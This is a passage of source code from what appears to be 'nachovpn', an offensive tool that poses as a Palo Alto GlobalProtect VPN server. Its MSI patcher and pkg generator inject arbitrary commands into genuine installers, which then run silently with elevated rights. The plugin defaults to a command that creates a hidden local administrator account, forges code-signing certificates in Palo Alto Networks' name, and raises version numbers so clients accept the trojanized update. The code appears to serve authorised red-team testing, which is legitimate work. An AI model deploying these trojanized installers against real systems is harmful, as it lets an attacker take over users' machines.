sorted(x86_keys)[-1] latest_version_x64 = sorted(x64_keys)[-1] return latest_version_x86, latest_version_x64 def download_file(self, url, output_path): print(f"Downloading file from: {url}") response = requests.get(url, stream=True) response.raise_for_status() total_size = int(response.headers.get('content-length', 0)) block_size = 1024 current_size = 0 with open(output_path, 'wb') as f: for data in response.iter_content(block_size): current_size += len(data) f.write(data) # Calculate progress if total_size: progress = int(50 * current_size / total_size) sys.stdout.write(f"\rDownloading: [{'=' * progress}{' ' * (50-progress)}] {current_size}/{total_size} bytes") sys.stdout.flush() # New line after progress bar print() def download_latest_msi(self): latest_version_x86, latest_version_x64 = self.get_latest_versions() x86_url = f"{self.xml_url}/{latest_version_x86}" x64_url = f"{self.xml_url}/{latest_version_x64}" print(f"Downloading latest MSI files (version: {latest_version_x86.split('/')[0]})") # Download both MSI files os.makedirs(self.output_dir, exist_ok=True) x86_path = os.path.join(self.output_dir, self.x86_msi) x64_path = os.path.join(self.output_dir, self.x64_msi) print(f"Downloading: {self.x86_msi}") self.download_file(x86_url, x86_path) print(f"Downloading: {self.x64_msi}") self.download_file(x64_url, x64_path) # Verify downloads if not os.path.getsize(x86_path) or not os.path.getsize(x64_path): raise Exception("Failed to download MSI files") print(f"Successfully downloaded {self.x86_msi} and {self.x64_msi}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='Download GlobalProtect MSI files') parser.add_argument('-o', '--output-dir', default=os.path.join(os.getcwd(), 'downloads'), help='Directory to store downloaded MSI files. Defaults to ./downloads/') parser.add_argument('-f', '--force', action='store_true', help='Force download even if files exist') group = parser.add_mutually_exclusive_group() group.add_argument('-d', '--download', action='store_true', help='Download latest MSI files') group.add_argument('-v', '--version', action='store_true', help='Show latest version information only') args = parser.parse_args() downloader = MSIDownloader(output_dir=args.output_dir) if args.version: x86_version, x64_version = downloader.get_latest_versions() print(f"Latest x86 version: {x86_version.split('/')[0]}") print(f"Latest x64 version: {x64_version.split('/')[0]}") # Check if MSI files exist or if force download is enabled elif args.download and (not os.path.exists(os.path.join(args.output_dir, "GlobalProtect.msi")) or \ not os.path.exists(os.path.join(args.output_dir, "GlobalProtect64.msi")) or args.force): x86_version, x64_version = downloader.get_latest_versions() downloader.download_latest_msi() with open(os.path.join(args.output_dir, "msi_version.txt"), "w") as f: f.write(x64_version.split('/')[0]) else: parser.print_help() ================================================ FILE: src/nachovpn/plugins/paloalto/msi_patcher.py ================================================ from cabarchive import CabArchive, CabFile import logging import argparse import shutil import os import uuid import warnings import subprocess import tempfile import random import string import csv import hashlib if os.name == 'nt': warnings.filterwarnings("ignore", category=DeprecationWarning) import msilib ACTION_TYPE_JSCRIPT = 6 ACTION_TYPE_CMD = 34 ACTION_TYPE_SHELL = 50 # https://learn.microsoft.com/en-us/windows/win32/msi/custom-action-return-processing-options ACTION_TYPE_CONTINUE = 0x40 # Don't fail the installation if the command fails ACTION_TYPE_ASYNC = 0x80 # Don't wait for the command to complete - only relevant for EXE commands # https://learn.microsoft.com/en-us/windows/win32/msi/custom-action-in-script-execution-options ACTION_TYPE_COMMIT = 0x200 # Only run once the files have been written to disk - useful for drop & exec ACTION_TYPE_IN_SCRIPT = 0x400 # Schedule this as part of the installation process ACTION_TYPE_NO_IMPERSONATE = 0x800 # Don't drop privs ACTION_SEQUENCE_POSITION = 4999 # Fire the command after the files are written to disk by the installation process def random_name(length=12): return ''.join(random.choice(string.ascii_letters) for _ in range(length)) def random_hash(): return hashlib.md5(random_name().encode()).hexdigest().upper() class MSIPatcher: def get_msi_version(self, msi_path): raise NotImplementedError def increment_msi_version(self, msi_path): raise NotImplementedError def add_custom_action(self, msi_path, name, type, source, target, sequence): raise NotImplementedError def add_file(self, msi_path, file_path, component_name, feature_name): raise NotImplementedError class MSIPatcherWindows(MSIPatcher): def get_msi_version(self, msi_path): db = msilib.OpenDatabase(msi_path, msilib.MSIDBOPEN_READONLY) view = db.OpenView("SELECT Value FROM Property WHERE Property='ProductVersion'") view.Execute(None) result = view.Fetch() version = result.GetString(1) view.Close() db.Close() return version def set_msi_version(self, msi_path, new_version, change_product_code=True): db = msilib.OpenDatabase(msi_path, msilib.MSIDBOPEN_DIRECT) view = db.OpenView("SELECT `Value` FROM `Property` WHERE `Property` = 'ProductVersion'") view.Execute(None) record = view.Fetch() current_version = None if record: current_version = record.GetString(1) update_view = db.OpenView("UPDATE `Property` SET `Value` = ? WHERE `Property` = 'ProductVersion'") update_record = msilib.CreateRecord(1) update_record.SetString(1, new_version) update_view.Execute(update_record) update_view.Close() db.Commit() if change_product_code: new_product_code = '{' + str(uuid.uuid4()).upper() + '}' product_code_view = db.OpenView("UPDATE `Property` SET `Value` = ? WHERE `Property` = 'ProductCode'") product_code_record = msilib.CreateRecord(1) product_code_record.SetString(1, new_product_code) product_code_view.Execute(product_code_record) product_code_view.Close() db.Commit() logging.info(f"New ProductCode: {new_product_code}") if current_version and new_version: logging.info(f"MSI version updated from {current_version} to {new_version}") else: logging.error("ProductVersion property not found in MSI") view.Close() db.Close() def increment_msi_version(self, msi_path, change_product_code=True): current_version = self.get_msi_version(msi_path) if not current_version: logging.error("ProductVersion property not found in MSI") return False new_version = self.get_higher_version(current_version) self.set_msi_version(msi_path, new_version, change_product_code) def add_custom_action(self, msi_path, name, type, source, target, sequence): db = msilib.OpenDatabase(msi_path, msilib.MSIDBOPEN_DIRECT) # Create a property to store the source source_key = random_name() view = db.OpenView("INSERT INTO `Property` (`Property`, `Value`) VALUES (?, ?)") rec = msilib.CreateRecord(2) rec.SetString(1, source_key) rec.SetString(2, source) view.Execute(rec) view.Close() # Create a new CustomAction record ca = db.OpenView("INSERT INTO `CustomAction` " "(`Action`, `Type`, `Source`, `Target`) " "VALUES (?, ?, ?, ?)") rec = msilib.CreateRecord(4) rec.SetString(1, name) # Action rec.SetInteger(2, type) # Type rec.SetString(3, source_key) # Source rec.SetString(4, target) # Target ca.Execute(rec) ca.Close() db.Commit() # Schedule the CustomAction in the appropriate sequence seq = db.OpenView("INSERT INTO `" + sequence + "` " "(`Action`, `Condition`, `Sequence`) " "VALUES (?, ?, ?)") rec = msilib.CreateRecord(3) rec.SetString(1, name) # Action rec.SetString(2, "") # Condition (probably want to use "NOT Installed") rec.SetInteger(3, ACTION_SEQUENCE_POSITION) # Sequence seq.Execute(rec) seq.Close() db.Commit() db.Close() return True def add_file(self, msi_path, file_path, component_name, feature_name): db = msilib.OpenDatabase(msi_path, msilib.MSIDBOPEN_DIRECT) file_name = os.path.basename(file_path) file_key = f'_{random_hash()}' component_key = f'C_{file_key}' cab_name = f"_{random_hash()}" # Create a new cabinet file with tempfile.TemporaryDirectory() as temp_dir: cab_path = os.path.join(temp_dir, cab_name) self.create_cab_file(file_path, file_key, cab_path) # Add cabinet as a stream msilib.add_stream(db, cab_name, cab_path) # Get the highest existing sequence number from the File table max_sequence = 0 view = db.OpenView("SELECT `Sequence` FROM `File`") view.Execute(None) while True: rec = view.Fetch() if not rec: break sequence = rec.GetInteger(1) if sequence > max_sequence: max_sequence = sequence view.Close() new_sequence = max_sequence + 1 # Add to File table file_size = os.path.getsize(file_path) view = db.OpenView("INSERT INTO `File` (`File`, `Component_`, `FileName`, `FileSize`, `Version`, `Language`, `Attributes`, `Sequence`) VALUES (?, ?, ?, ?, ?, ?, ?, ?)") rec = msilib.CreateRecord(8) rec.SetString(1, file_key) rec.SetString(2, component_key) rec.SetString(3, file_name) rec.SetInteger(4, file_size) rec.SetString(5, '') rec.SetString(6, '') rec.SetInteger(7, 512) # Attributes (compressed) rec.SetInteger(8, new_sequence) view.Execute(rec) view.Close() # Add to Component table view = db.OpenView("INSERT INTO `Component` (`Component`, `ComponentId`, `Directory_`, `Attributes`, `Condition`, `KeyPath`) VALUES (?, ?, ?, ?, ?, ?)") rec = msilib.CreateRecord(6) rec.SetString(1, component_key) rec.SetString(2, '{' + str(uuid.uuid4()).upper() + '}') rec.SetString(3, 'TARGETDIR') rec.SetInteger(4, 256) # Attributes rec.SetString(5, '') rec.SetString(6, file_key) view.Execute(rec) view.Close() # Query the Feature table to get the Feature key view = db.OpenView("SELECT `Feature` FROM `Feature`") view.Execute(None) rec = view.Fetch() if not rec: feature_key = random_hash() view = db.OpenView("INSERT INTO `Feature` (`Feature`, `Feature_Parent`, `Title`, `Description`, `Display`, `Level`, `Directory_`, `Attributes`) VALUES (?, ?, ?, ?, ?, ?, ?, ?)") rec = msilib.CreateRecord(8) rec.SetString(1, feature_key) rec.SetString(2, '') rec.SetString(3, '') rec.SetString(4, '') rec.SetInteger(5, 2) rec.SetString(6, 1) rec.SetString(7, 'TARGETDIR') rec.SetInteger(8, 0) view.Execute(rec) else: feature_key = rec.GetString(1) view.Close() # Add to FeatureComponents table view = db.OpenView("INSERT INTO `FeatureComponents` (`Feature_`, `Component_`) VALUES (?, ?)") rec = msilib.CreateRecord(2) rec.SetString(1, feature_key) rec.SetString(2, component_key) view.Execute(rec) view.Close() # Add new Media entry logging.info("Adding new Media entry") max_disk_id = 0 view = db.OpenView("SELECT `DiskId` FROM `Media`") view.Execute(None) while True: rec = view.Fetch() if not rec: break disk_id = rec.GetInteger(1) if disk_id > max_disk_id: max_disk_id = disk_id view.Close() logging.info(f"Existing max DiskId: {max_disk_id}") new_disk_id = max_disk_id + 1 logging.info(f"New DiskId: {new_disk_id}") view = db.OpenView("INSERT INTO `Media` (`DiskId`, `LastSequence`, `DiskPrompt`, `Cabinet`) VALUES (?, ?, ?, ?)") rec = msilib.CreateRecord(4) rec.SetInteger(1, new_disk_id) rec.SetInteger(2, new_sequence) rec.SetString(3, '') rec.SetString(4, f'#{cab_name}') view.Execute(rec) view.Close() db.Commit() db.Close() logging.info(f"Added file to MSI: {file_name}") logging.info(f"File key: {file_key}") logging.info(f"Component key: {component_key}") logging.info(f"Sequence number: {new_sequence}") logging.info(f"New Media entry: DiskId {new_disk_id}") return True @staticmethod def create_cab_file(file_path, file_key, output_path): file_name = os.path.basename(file_path) arc = CabArchive() with open(file_path, 'rb') as f: arc[file_key] = CabFile(f.read()) with open(output_path, 'wb') as f: f.write(arc.save(True)) class MSIPatcherLinux(MSIPatcher): def get_msi_version(self, msi_path): with tempfile.TemporaryDirectory() as temp_dir: subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True) property_file = os.path.join(temp_dir, 'Property.idt') with open(property_file, 'r') as f: reader = csv.reader(f, delimiter='\t') for row in reader: if row[0] == 'ProductVersion': return row[1] return None def increment_msi_version(self, msi_path, change_product_code=True): current_version = self.get_msi_version(msi_path) if not current_version: logging.error("ProductVersion property not found in MSI") return False new_version = self.get_higher_version(current_version) self.set_msi_version(msi_path, new_version, change_product_code) def set_msi_version(self, msi_path, new_version, change_product_code=True): with tempfile.TemporaryDirectory() as temp_dir: subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True) property_file = os.path.join(temp_dir, 'Property.idt') updated_property_rows = [] current_version = None new_product_code = None with open(property_file, 'r') as f: reader = csv.reader(f, delimiter='\t') for row in reader: if row[0] == 'ProductVersion': current_version = row[1] row[1] = new_version elif row[0] == 'ProductCode' and change_product_code: new_product_code = '{' + str(uuid.uuid4()).upper() + '}' row[1] = new_product_code updated_property_rows.append(row) with open(property_file, 'w', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerows(updated_property_rows) subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, 'Property.idt')], check=True) if current_version and new_version: logging.info(f"MSI version updated from {current_version} to {new_version}") if new_product_code: logging.info(f"New ProductCode: {new_product_code}") def add_custom_property(self, msi_path, name, value): with tempfile.TemporaryDirectory() as temp_dir: subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True) property_file = os.path.join(temp_dir, 'Property.idt') with open(property_file, 'a', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerow([name, value]) subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, 'Property.idt')], check=True) return True def add_custom_action(self, msi_path, name, type, source, target, sequence): with tempfile.TemporaryDirectory() as temp_dir: subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True) # Create a property to store the source source_key = random_name() property_file = os.path.join(temp_dir, 'Property.idt') with open(property_file, 'a', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerow([source_key, source]) # Add CustomAction custom_action_file = os.path.join(temp_dir, 'CustomAction.idt') with open(custom_action_file, 'a', newline='') as f: # Configure the CSV writer not to wrap fields in quotes even if they contain special chars, # and to only try to escape \t and ` (which shouldn't occur in most Windows commands) writer = csv.writer(f, delimiter='\t', quoting=csv.QUOTE_NONE, quotechar='`') writer.writerow([name, str(type), source_key, target]) # Add to sequence sequence_file = os.path.join(temp_dir, f'{sequence}.idt') with open(sequence_file, 'a', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerow([name, '', str(ACTION_SEQUENCE_POSITION)]) # Add the property file to the MSI subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, 'Property.idt')], check=True) # Add the custom action to the MSI # For some reason the property file needs to be added twice like this subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, 'Property.idt'), '-i', os.path.join(temp_dir, 'CustomAction.idt')], check=True) # Add the sequence to the MSI subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, f'{sequence}.idt')], check=True) return True def add_file(self, msi_path, file_path, component_name, feature_name): with tempfile.TemporaryDirectory() as temp_dir: subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True) file_name = os.path.basename(file_path) file_key = f'_{random_hash()}' component_key = f'C_{file_key}' cab_name = f"_{random_hash()}" # Create a new cabinet file cab_path = os.path.join(temp_dir, cab_name) self.create_cab_file(file_path, file_key, cab_path) # Get the highest existing sequence number from the File table file_table = os.path.join(temp_dir, 'File.idt') max_sequence = 0 with open(file_table, 'r') as f: reader = csv.reader(f, delimiter='\t') # Skip headers for _ in range(3): next(reader) for row in reader: if row and len(row) > 7 and row[7].isdigit(): max_sequence = max(max_sequence, int(row[7])) # Sequence is the 8th column new_sequence = max_sequence + 1 # Add to File table file_size = os.path.getsize(file_path) with open(file_table, 'a', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerow([file_key, component_key, file_name, file_size, '', '', 512, new_sequence]) # Add to Component table component_table = os.path.join(temp_dir, 'Component.idt') with open(component_table, 'a', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerow([component_key, '{' + str(uuid.uuid4()).upper() + '}', 'TARGETDIR', 256, '', file_key]) # Query the Feature table to get the Feature key feature_table = os.path.join(temp_dir, 'Feature.idt') feature_key = None with open(feature_table, 'r') as f: reader = csv.reader(f, delimiter='\t') # Skip headers for _ in range(3): next(reader) row = next(reader, None) if row: feature_key = row[0] else: feature_key = random_hash() with open(feature_table, 'a', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerow([feature_key, '', '', '', 2, 1, 'TARGETDIR', 0]) # Add to FeatureComponents table feature_components_table = os.path.join(temp_dir, 'FeatureComponents.idt') with open(feature_components_table, 'a', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerow([feature_key, component_key]) # Add new Media entry media_table = os.path.join(temp_dir, 'Media.idt') new_disk_id = 1 with open(media_table, 'r') as f: reader = csv.reader(f, delimiter='\t') # Skip headers for _ in range(3): next(reader) for row in reader: new_disk_id = max(new_disk_id, int(row[0])) + 1 with open(media_table, 'a', newline='') as f: writer = csv.writer(f, delimiter='\t') writer.writerow([new_disk_id, new_sequence, '', f'#{cab_name}', '', '']) # Add cabinet file to MSI subprocess.run(['msibuild', msi_path, '-a', cab_name, cab_path], check=True) # Rebuild MSI with modified tables logging.info(f"Rebuilding MSI from: {temp_dir}") subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, 'File.idt'), '-i', os.path.join(temp_dir, 'Component.idt'), '-i', os.path.join(temp_dir, 'Feature.idt'), '-i', os.path.join(temp_dir, 'FeatureComponents.idt'), '-i', os.path.join(temp_dir, 'Media.idt')], check=True) logging.info(f"Added file to MSI: {file_name}") logging.info(f"File key: {file_key}") logging.info(f"Component key: {component_key}") logging.info(f"Sequence number: {new_sequence}") logging.info(f"New Media entry: DiskId {new_disk_id}") return True @staticmethod def create_cab_file(file_path, file_key, output_path): file_name = os.path.basename(file_path) arc = CabArchive() with open(file_path, 'rb') as f: arc[file_key] = CabFile(f.read()) with open(output_path, 'wb') as f: f.write(arc.save(True)) def get_msi_patcher(): if os.name == 'nt': return MSIPatcherWindows() else: return MSIPatcherLinux() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-i', '--input', help='Input MSI file to add custom action to', required=True) parser.add_argument('-o', '--output', help='Output file to write the patched MSI to', required=True) parser.add_argument('-c', '--command', help='Command to inject into MSI', required=False) parser.add_argument('-f', '--force', help="Delete output file if it exists", action='store_true') parser.add_argument('--increment', help="Increment MSI version", action='store_true') parser.add_argument('--add-file', help='Path to file to be added to the MSI', required=False) parser.add_argument('--feature', help='Feature to add the file to', default="auto") args = parser.parse_args() sequence = "InstallExecuteSequence" action_type = (ACTION_TYPE_SHELL | ACTION_TYPE_CONTINUE | ACTION_TYPE_ASYNC | ACTION_TYPE_COMMIT | ACTION_TYPE_IN_SCRIPT | ACTION_TYPE_NO_IMPERSONATE) source = "C:\\windows\\system32\\cmd.exe" patcher = get_msi_patcher() if os.path.exists(args.output): if args.force: os.remove(args.output) else: print(f"Output file {args.output} already exists") exit(1) shutil.copy(args.input, args.output) if args.command: target = args.command if patcher.add_custom_action(args.output, f"_{random_hash()}", action_type, source, target, sequence): print("Custom action added") modified = True if args.add_file and patcher.add_file(args.output, args.add_file, random_hash(), args.feature): print("File added to MSI") if args.increment: patcher.increment_msi_version(args.output) print("MSI version incremented") if not args.add_file and not args.command and not args.increment: print("Warning: Writing unmodified MSI as no changes were requested") ================================================ FILE: src/nachovpn/plugins/paloalto/pkg_generator.py ================================================ from Crypto.Hash import SHA from Crypto.PublicKey import RSA from Crypto.Signature import PKCS1_v1_5 from cryptography import x509 from cryptography.hazmat.primitives import serialization from cryptography.hazmat.backends import default_backend import io import os import sys import zlib import logging import struct import hashlib import random import base64 import string import datetime import argparse DIST_TEMPLATE = """ {package_name} """ TOC_TEMPLATE = """ 20 0 {creation_time} {signature_toc_entry} Distribution file {compressed_hash} {extracted_hash} {extracted_length} {data_offset} {compressed_length} """ # 461137009.8 SIGNATURE_TOC_ENTRY = """ 20 {signature_length} {x509_certs} """ def build_signature_toc(certificates, signature_length): x509_certs = '' for cert in certificates: x509_certs += f'{cert}' return SIGNATURE_TOC_ENTRY.format( signature_length=signature_length, x509_certs=x509_certs).rstrip() def extract_cert_base64(cert_file): try: with open(cert_file, "rb") as f: cert = x509.load_pem_x509_certificate(f.read(), default_backend()) der_cert = cert.public_bytes(encoding=serialization.Encoding.DER) return base64.b64encode(der_cert).decode() except Exception as e: logging.error(f'Unable to import {cert_file}: {e}') return None def get_signature(key_file, data): try: with open(key_file, 'rb') as f: key_data = RSA.import_key(f.read()) return PKCS1_v1_5.new(key_data).sign(SHA.new(data)) except: logging.error(f'Unable to get signature with key: {key_file}') return None def random_string(length=12): return ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(length)) def generate_pkg(version, command, package_name, cert_file=None, key_file=None, ca_file=None): package_id = '{}.{}'.format(random_string(6).lower(), random_string(6).lower()) installation_check = random_string() dist_file = DIST_TEMPLATE.format( package_id=package_id, package_name=package_name, command=command, installation_check=installation_check, bundle_version=version ).encode() # figure out some offsets .. data_offset = SHA.digest_size sig_toc_entry = '' if key_file and cert_file and ca_file: test_sig = get_signature(key_file, b"foobar") if not test_sig: return False # increment the offset by the size of the signature data sig_len = len(test_sig) data_offset += sig_len # get required certificates ca_cert = extract_cert_base64(ca_file) signing_cert = extract_cert_base64(cert_file) if not ca_cert or not signing_cert: return False # now populate the TOC entry sig_toc_entry = build_signature_toc([signing_cert, ca_cert], sig_len) dist_file_compressed = zlib.compress(dist_file) toc_xml = TOC_TEMPLATE.format( extracted_hash=hashlib.sha1(dist_file).hexdigest(), extracted_length=len(dist_file), compressed_hash=hashlib.sha1(dist_file_compressed).hexdigest(), compressed_length=len(dist_file_compressed), signature_toc_entry=sig_toc_entry, data_offset=data_offset, creation_time=datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S") ).encode() #logging.debug(toc_xml) toc_compressed = zlib.compress(toc_xml) buf = io.BytesIO() buf.write(b'xar!') # magic buf.write(b'\x00\x1c') # length of header buf.write(b'\x00\x01') # version buf.write(struct.pack('>Q', len(toc_compressed))) # length of TOC compressed data buf.write(struct.pack('>Q', len(toc_xml))) # length of TOC uncompressed data buf.write(b'\x00\x00\x00\x01') # checksum algorithm (sha1) buf.write(toc_compressed) buf.write(hashlib.sha1(toc_compressed).digest()) # sha1 of compressed data if key_file and cert_file: buf.write(get_signature(key_file, toc_compressed)) # write signature buf.write(dist_file_compressed) return buf.getvalue() if __name__ == '__main__': parser = argparse.ArgumentParser(description='Create a .pkg file for macOS and optionally sign it') parser.add_argument("-v", "--version", required=True, help="CFBundleVersion for the PKG file") parser.add_argument("-c", "--command", help="Command to execute", required=True) parser.add_argument("-o", "--output", required=True, help="Output file") parser.add_argument("-n", "--name", required=True, help="Package name. Defaults to the output file name") parser.add_argument("-a", "--apple-cert", help="Signing certificate") parser.add_argument("-k", "--apple-key", help="Key for signing certificate") parser.add_argument("--ca-cert", help="CA Certificate", dest="ca_cert") args = parser.parse_args() if args.name: pkg_name = args.name else: pkg_name = os.path.basename(args.output_file) cert_args = [args.apple_key, args.apple_cert, args.ca_cert] if any(cert_args) and not all(cert_args): parser.error ('You must supply --cert, --key and --ca-cert together') for arg in cert_args: if arg and not os.path.exists(arg): print(f"[!] Certificate file '{arg}' not found") sys.exit(1) outbuf = generate_pkg(args.version, args.command, pkg_name, args.apple_cert, args.apple_key, args.ca_cert) if not outbuf: sys.exit(1) with open(args.output, 'wb') as f: f.write(outbuf) print(f'[+] Done! pkg file written to: {args.output}') ================================================ FILE: src/nachovpn/plugins/paloalto/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from flask import Response, abort, request, redirect from nachovpn.plugins.paloalto.pkg_generator import generate_pkg from nachovpn.plugins.paloalto.msi_patcher import get_msi_patcher, random_hash, ACTION_TYPE_SHELL, ACTION_TYPE_CONTINUE, \ ACTION_TYPE_ASYNC, ACTION_TYPE_COMMIT, ACTION_TYPE_IN_SCRIPT, ACTION_TYPE_NO_IMPERSONATE from urllib.parse import urlparse, parse_qs import subprocess import shutil import uuid import ssl import os import io import re import random # SSL-VPN packet types SSL_VPN_MAGIC = bytes.fromhex('1a2b3c4d') SSL_VPN_STATIC = bytes.fromhex('0100000000000000') KEEP_ALIVE_PACKET = bytes.fromhex('1a2b3c4d000000000000000000000000') ETHER_TYPES = {0x0800: 'IPv4', 0x0806: 'ARP', 0x86dd: 'IPv6'} class PaloAltoPlugin(VPNPlugin): def __init__(self, *args, **kwargs): # provide the templates directory relative to this plugin super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates')) # Payload storage self.payload_dir = os.path.join(os.getcwd(), 'payloads') self.download_dir = os.path.join(os.getcwd(), 'downloads') os.makedirs(self.payload_dir, exist_ok=True) os.makedirs(self.download_dir, exist_ok=True) # Stores the downgraded state for each version suffix self.allocated_suffixes = {} # Payload options self.msi_force_patch = os.getenv("PALO_ALTO_FORCE_PATCH", False) self.msi_add_file = os.getenv("PALO_ALTO_MSI_ADD_FILE", None) self.msi_increment_version = os.getenv("PALO_ALTO_MSI_INCREMENT_VERSION", True) self.pkg_command = os.getenv("PALO_ALTO_PKG_COMMAND", "touch /tmp/pwnd") self.msi_command = os.getenv( "PALO_ALTO_MSI_COMMAND", r"net user pwnd Passw0rd123! /add && net localgroup administrators pwnd /add" ) # Certificate paths self.apple_cert_path = os.path.join('certs', 'paloalto-apple.cer') self.apple_key_path = os.path.join('certs', 'paloalto-apple.key') self.codesign_cert_path = os.path.join('certs', 'paloalto-codesign.cer') self.codesign_key_path = os.path.join('certs', 'paloalto-codesign.key') self.codesign_pfx_path = os.path.join('certs', 'paloalto-codesign.pfx') # Gateway config self.gateway_config = { "gateway_ip": self.external_ip, "ca_certificate": "", "dns_name": self.dns_name, } # Run bootstrap if not self.bootstrap(): self.logger.error(f"Failed to bootstrap. Disabling {self.__class__.__name__}") self.enabled = False def generate_unique_suffix(self): while True: suffix = os.urandom(8).hex() if suffix not in self.allocated_suffixes: self.allocated_suffixes[suffix] = False self.logger.info(f"Generated unique suffix: {suffix}") return suffix def generate_pkg(self): pkg_buf = generate_pkg( self.upgrade_version.replace('-', 'f'), self.pkg_command, "GlobalProtect", self.apple_cert_path, self.apple_key_path, self.cert_manager.ca_cert_path ) pkg_path = os.path.join(self.payload_dir, "GlobalProtect.pkg") with open(pkg_path, 'wb') as f: f.write(pkg_buf) return pkg_path def get_higher_version(self, version): version = version.split('-')[0] major, minor, patch = map(int, version.split('.')) patch += 1 if patch == 100: minor += 1 patch = 0 if minor == 100: major += 1 minor = 0 return f"{major}.{minor}.{patch}" def get_latest_msi_version(self): version_file = os.path.join(self.download_dir, "msi_version.txt") if not os.path.exists(version_file): self.logger.error(f"MSI version file not found") self.logger.info(f"Run downloader to fetch latest MSI files, or manually add {version_file}") return None with open(version_file, "r") as f: version = f.read().strip() self.logger.info(f"Latest MSI version: {version}") return version def sign_msi_files(self): if not os.path.exists(self.codesign_cert_path): self.logger.error("Windows code signing certificate not found, skipping signing") return False if not os.path.exists(os.path.join(self.payload_dir, "GlobalProtect.msi")) or \ not os.path.exists(os.path.join(self.payload_dir, "GlobalProtect64.msi")): self.logger.error("MSI files not found, skipping signing") return False if os.name == "nt": self.logger.error("Windows MSI signing not supported yet") return False if not os.path.exists('/usr/bin/osslsigncode'): self.logger.error("osslsigncode not found, skipping signing") return False # Sign the MSI files for msi_file in ["GlobalProtect.msi", "GlobalProtect64.msi"]: input_file = os.path.join(self.payload_dir, msi_file) output_file = os.path.join(self.payload_dir, f"{msi_file}.signed") # Remove existing signed file if os.path.exists(output_file): os.remove(output_file) proc = subprocess.run([ "/usr/bin/osslsigncode", "sign", "-pkcs12", self.codesign_pfx_path, "-in", input_file, "-out", output_file, ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if proc.returncode or not os.path.exists(output_file): self.logger.error(f"Failed to sign {msi_file}: {proc.returncode}") return False else: self.logger.info(f"Signed {msi_file}") os.replace(output_file, input_file) return True def verify_msi_files(self): # Verify that the MSI files are signed by our current CA if os.name == "nt": self.logger.error("Windows MSI verification not supported yet") return True if os.name == "posix" and not os.path.exists('/usr/bin/osslsigncode'): self.logger.error("osslsigncode not found, skipping verification") return True for msi_file in ["GlobalProtect.msi", "GlobalProtect64.msi"]: proc = subprocess.run([ "/usr/bin/osslsigncode", "verify", "-CAfile", self.cert_manager.ca_cert_path, "-in", os.path.join(self.payload_dir, msi_file), ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if proc.returncode: self.logger.error(f"Failed to verify {msi_file}: {proc.returncode}") return False self.logger.info("MSI files verified") return True def patch_msi_files(self): # Patch the msi files if os.path.exists(os.path.join(self.payload_dir, "GlobalProtect.msi")) and \ os.path.exists(os.path.join(self.payload_dir, "GlobalProtect64.msi")) and \ not self.msi_force_patch and self.verify_msi_files(): self.logger.warning("MSI files already patched, skipping") return True if os.name == "posix" and not os.path.exists('/usr/bin/msidump'): self.logger.error("msitools not found, skipping patching") return True # Check if MSI files are present if not os.path.exists(os.path.join(self.download_dir, "GlobalProtect.msi")) or \ not os.path.exists(os.path.join(self.download_dir, "GlobalProtect64.msi")): self.logger.warning(f"MSI files not found in download directory: {self.download_dir}") self.logger.info(f"Run downloader to fetch latest MSI files, or add manually") return False patcher = get_msi_patcher() for msi_file in ["GlobalProtect.msi", "GlobalProtect64.msi"]: # Copy default MSI file to payload directory input_file = os.path.join(self.download_dir, msi_file) output_file = os.path.join(self.payload_dir, msi_file) shutil.copy(input_file, output_file) # Add patches if self.msi_add_file: patcher.add_file(output_file, self.msi_add_file, random_hash(), "DefaultFeature") self.logger.info(f"Added file {self.msi_add_file} to {msi_file}") if self.msi_command: action_type = (ACTION_TYPE_SHELL | ACTION_TYPE_CONTINUE | ACTION_TYPE_ASYNC | ACTION_TYPE_COMMIT | ACTION_TYPE_IN_SCRIPT | ACTION_TYPE_NO_IMPERSONATE) patcher.add_custom_action(output_file, f"_{random_hash()}", action_type, "C:\\windows\\system32\\cmd.exe", f"/c {self.msi_command}", "InstallExecuteSequence") self.logger.info(f"Added custom action to {msi_file}") if self.msi_increment_version: patcher.increment_msi_version(output_file) self.logger.info(f"Incremented MSI version for {msi_file}") self.logger.info("MSI files patched") return True def bootstrap(self): # Get versions self.latest_version = self.get_latest_msi_version() if not self.latest_version: return False self.upgrade_version = self.get_higher_version(self.latest_version) # Generate an Apple code signing certificate if not os.path.exists(self.apple_cert_path) or not os.path.exists(self.apple_key_path): self.cert_manager.generate_apple_certificate( common_name="Developer ID Installer: Palo Alto Networks (PXPZ95SK77)", cert_path=self.apple_cert_path, key_path=self.apple_key_path ) # Generate a Windows code signing certificate if not os.path.exists(self.codesign_cert_path) or not os.path.exists(self.codesign_key_path): self.cert_manager.generate_codesign_certificate( common_name="Palo Alto Networks", cert_path=self.codesign_cert_path, key_path=self.codesign_key_path, pfx_path=self.codesign_pfx_path ) # Load the CA certificate into the gateway config with open(self.cert_manager.ca_cert_path, 'r') as f: self.gateway_config["ca_certificate"] = f.read() # Generate the macOS pkg payload (GlobalProtect.pkg) self.generate_pkg() # Get latest MSI version latest_version = self.get_latest_msi_version() if not latest_version: return False # Check for .old MSI files for msi_file in ["GlobalProtect.msi", "GlobalProtect64.msi"]: old_file = os.path.join(self.download_dir, 